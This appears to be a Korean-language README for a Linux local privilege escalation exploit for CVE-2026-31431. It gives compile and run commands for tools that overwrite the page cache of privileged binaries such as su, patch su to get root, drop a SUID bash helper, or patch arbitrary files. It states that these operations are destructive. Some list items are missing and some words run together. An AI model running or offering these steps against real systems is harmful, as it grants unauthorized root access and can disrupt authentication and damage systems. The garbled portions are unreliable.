
리눅스 로컬 권한 상승 익스플로잇 for CVE-2026-31431, 원시 및 복구 가능한 워크플로우 포함.
이 Linux LPE 익스플로잇 구현은 실행 시 파괴적입니다.
다음과 같은 권한 있는 대상의 실시간 페이지 캐시 뷰를 덮어씁니다:
supatch 모드로 전달된 모든 파일이는 일반적으로 디스크에 영구적으로 저장되는 일반적인 편집이 아니지만, 런타임 동작을 변경하며 인증/권한 흐름에 즉시 영향을 줄 수 있습니다.
이 저장소는 완전히 비파괴적인 root 모드를 제공하지 않습니다.
copyfail_raw_su_root.ccopyfail_portable_lpe.c둘 다 Linux 전용입니다.
추가 아키텍처용 사전 빌드 바이너리는 향후 업데이트에서 추가될 수 있습니다.
gcc -O2 -s copyfail_portable_lpe.c -o copyfail_portable_lpe
gcc -O2 -s copyfail_raw_su_root.c -o copyfail_raw_su_root
copyfail_portable_lpe.c의 경우, 다음을 실행하면:
./copyfail_portable_lpe
기본적으로 auto-revert 를 사용합니다.
즉, 복구 가능한 워크플로우를 먼저 시도한다는 의미입니다:
복구 가능한 모드가 실패하면, 프로그램은 폴백 모드 힌트를 출력합니다.
최소한의 원시 변형:
su를 직접 패치su를 즉시 실행./copyfail_raw_su_root
여러 모드를 가진 일반 변형.
명시적 비복원 모드:
./copyfail_portable_lpe auto
복구 우선 모드:
./copyfail_portable_lpe
./copyfail_portable_lpe auto-revert
복원 없이 SUID bash 헬퍼 드롭:
./copyfail_portable_lpe helper ./.rootsh
헬퍼 드롭 후 패치된 대상 복원 시도:
./copyfail_portable_lpe helper-revert ./.rootsh
선택한 파일에 동일 길이 문자열 교체:
./copyfail_portable_lpe patch <file> <find> <replace>
원시 su 패치 경로:
./copyfail_portable_lpe raw-su-elf
auto-revert 및 helper-revert는 여전히 익스플로잇 중 파괴적입니다.
다음과 같은 의미에서만 "복구 가능"합니다:
따라서 이는 파괴 후 복원 방식이지, 진정한 비파괴 방식이 아닙니다.
auto / auto-revert / helper / helper-revert / patch: Linux 지향적이며, 대상에서 컴파일 시 CPU 아키텍처에 덜 밀접하게 결합됨raw-su-elf: x86_64 Linux 전용이 저장소는 다음 용도로 제공됩니다:
소유자의 명시적 허가 없이 시스템, 계정 또는 네트워크에 대해 이러한 자료를 사용하지 마십시오.
저자와 기여자는 이 콘텐츠를 보증 없이 있는 그대로 제공하며, 이 저장소의 코드 또는 기술 사용으로 인한 오용, 손상, 데이터 손실, 서비스 중단 또는 법적 결과에 대해 책임을 지지 않습니다.